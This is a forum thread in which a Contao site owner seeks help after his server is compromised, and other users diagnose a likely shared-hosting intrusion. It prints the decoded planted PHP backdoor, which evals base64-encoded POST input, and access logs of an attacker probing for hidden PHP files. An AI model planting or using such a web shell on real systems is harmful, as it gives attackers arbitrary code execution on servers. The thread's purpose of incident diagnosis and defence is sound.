Unknown vulnerability in Contao?

[Ruud]

I'm posting this in the German forum because this might be pretty important, but I don't yet know for sure where the problem lies and what to do. I have a standard 2.10.3 Contao installation with several extensions as listed below. The installation seems to catch a virus of which I haven't yet been able to trace the origins of. The virus tries to spam e-mail using the server via a file that is added which contains base64 encoded text. When decoded this is the content of the file .19df.php:

Code:

if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}

That code would basically allow whoever put it on to do just about anything. But the hosting party keeps disabling the website when I put it back online, claiming there is a virus without giving me any more information. I was lucky to catch the file above before the host did.

So I guess my question is; were to best look. The customer does not have FTP data to the website, none of about 80 sites my computer can access seem infected either nor has my computer a virus (concluded after extensive scanning with 4 different programs). That leaves open the webhost or Contao/Extensions.

I never had a problem with Contao thusfar so my first reaction was "nope, not the CMS at fault", but then how do I know for sure? Looking up the filename and contents a possible vulnarability would be misconfigured forms (the website has a contact form and forms for e-commerce). I will ask the host the filename and date of the new file, so I can see if a form was submitted.

Extensions:

Code:

ajax 				1.0.7 stable 	3
conditionalselectmenu 		1.1.2 stable 	12
dcawizard 			1.2.0 beta2 	4
googleanalytics 		1.3.3 stable 	6
isotope 			1.3.0 rc1 	20
isotope_payment_icepay 		1.0.0 stable 	19
isotope_payment_ideal	 	1.0.1 stable 	23
MultiTextWizard 		1.1.3 stable 	5
tablelookupwizard 		1.1.2 stable 	4

Translation (by Google translate)
Ich frage mal im deutschen Forum, da dies möglicherweise ziemlich wichtig, aber ich weiß noch nicht genau wissen wo das Problem liegt und was zu tun ist. Ich habe einen Standard 2.10.3 Contao Installation mit mehreren Erweiterungen wie unten aufgeführt. Die Installation scheint ein Virus, von dem ich noch nicht gelungen, die Herkunft von Spuren zu fangen. Der Virus versucht, E-Mail-Spam mit dem Server über eine Datei, die hinzugefügt, enthält base64-codierten Text. Wenn decodiert das ist der Inhalt der Datei 0,19 df.php:

(the code)

Dieser Code würde im Grunde erlauben wer legte es auf, um so ziemlich alles tun. Aber die Hosting-Partei hält das Deaktivieren der Website, wenn ich es wieder online und behauptete, es ist ein Virus, ohne mir mehr Informationen. Ich hatte das Glück, um die Datei oben zu fangen, bevor der Gastgeber tat.

Also ich denke, meine Frage ist, wurden am besten aussehen. Der Kunde hat keinen FTP-Daten auf der Website kann keine der etwa 80 Seiten meines Computers zugreifen entweder infiziert scheinen noch hat mein Computer ein Virus (Schluss nach umfangreichen Scan mit 4 verschiedenen Programmen). Das lässt die Webhost oder Contao / Extensions.

Ich hatte nie ein Problem mit Contao Dies tue ich so meine erste Reaktion "Nö, nicht das CMS" war, dann aber wie kann ich sicher sein? Looking up den Dateinamen und den Inhalt einer möglichen vulnarability wäre falsch konfigurierte Formulare (die Webseite hat ein Kontaktformular und Formulare für E-Commerce) zu sein. Ich werde fragen, der Host der Dateiname und das Datum der neuen Datei, so kann ich sehen, ob ein Formular abgeschickt wurde.

[lindesbs]

Do you have already an injected system ?
Have you checked the core files with the system check tool ?

Any changes in the module files ?

Normally, the system core functionallity blocks injections.

I think, this would come from an external software/file, which is on the system path.

[andreas.schempp]

Hi Ruud,

A quick google for the issue reveals this:
http://www.google.ch/search?client=s...K6WX0QWC8uTRCg

The issue is not related to Contao, but your server has been hacked. Maybe due to a password problem (change it!) or any other vulnerable software on the server (e.g. Joomla or Wordpress). There's nothing Contao can do here to help you...

[Ruud]

Contao check turned out OK, there was a missing .txt file and a corrupt .html file. Investigation showed no problems with the .html. So that was not changed, not checking specific extensions.

Andreas, I've changed the password again. However, your statement about it cannot be Contao seems a bit quick without any further knowledge. Could you please tell me why you are so sure no-one found a vulnerability?

The infection got back 30 minutes after the website got online again, but there where no forms submitted, so it is definitely/probably not that. First some regular access and after 30 minutes this, with the last line pointing to a hidden file that exists (and I checked for those before getting everything back online)

Code:

31.184.244.28 - - [23/May/2012:15:43:30 +0200] "POST /private/logs/domein.nl/.5549.php HTTP/1.1" 404 1615 "-" "-" 1115 500
31.184.244.28 - - [23/May/2012:15:43:34 +0200] "POST /private/logs/.5549.php HTTP/1.1" 404 1561 "-" "-" 1088 473
31.184.244.28 - - [23/May/2012:15:43:46 +0200] "POST /.1611.php HTTP/1.1" 404 1535 "-" "-" 1075 460
31.184.244.28 - - [23/May/2012:15:43:51 +0200] "POST /private/mail/.1611.php HTTP/1.1" 404 1561 "-" "-" 1088 473
31.184.244.28 - - [23/May/2012:15:44:08 +0200] "POST /private/stats/domein.nl/.1fe7.php HTTP/1.1" 404 1617 "-" "-" 1116 501
31.184.244.28 - - [23/May/2012:15:44:13 +0200] "POST /private/.1fe7.php HTTP/1.1" 404 1551 "-" "-" 1083 468
31.184.244.28 - - [23/May/2012:15:44:16 +0200] "POST /stats/domein.nl/.1fe7.php HTTP/1.1" 401 1834 "-" "-" 1108 726
31.184.244.28 - - [23/May/2012:15:44:22 +0200] "POST /.28fc.php HTTP/1.1" 404 1535 "-" "-" 1075 460
31.184.244.28 - - [23/May/2012:15:44:27 +0200] "POST /public/documents/.28fc.php HTTP/1.1" 404 1569 "-" "-" 1092 477
31.184.244.28 - - [23/May/2012:15:44:31 +0200] "POST /public/.28fc.php HTTP/1.1" 404 1549 "-" "-" 1082 467
31.184.244.28 - - [23/May/2012:15:44:34 +0200] "POST /documents/music/.28fc.php HTTP/1.1" 404 1567 "-" "-" 1091 476
31.184.244.28 - - [23/May/2012:15:44:36 +0200] "POST /music/.28fc.php HTTP/1.1" 404 1547 "-" "-" 1081 466
31.184.244.28 - - [23/May/2012:15:44:49 +0200] "POST /public/.f51b.php HTTP/1.1" 404 1549 "-" "-" 1082 467
31.184.244.28 - - [23/May/2012:15:45:02 +0200] "POST /public/documents/video/.8cd3.php HTTP/1.1" 404 1581 "-" "-" 1098 483
31.184.244.28 - - [23/May/2012:15:45:14 +0200] "POST /video/.8cd3.php HTTP/1.1" 404 1547 "-" "-" 1081 466
31.184.244.28 - - [23/May/2012:15:45:17 +0200] "POST /.baf7.php HTTP/1.1" 200 85741 "-" "-" 1075 84666

[andreas.schempp]

I'm pretty sure because there has never been such a vulnerability, I know the Contao code very well and a lot of other system have this issue. It is most likely related to another software on the same server/hosting. The only idea I have so far is having your hosting partner disable FTP and see if it happens again in 30mins...

[xchs]

Hi Ruud,

I guess this is a shared hosting environment, isn't it? So the invasion comes most likely from another vhost/user account located on the same server.

Personally, I would try to run the PHP interpreter in a dedicated user context by switching to FastCGI instead of executing the corresponding Apache module that probably runs with the same user rights as the web server itself. After that, keep watching if your system gets compromised again.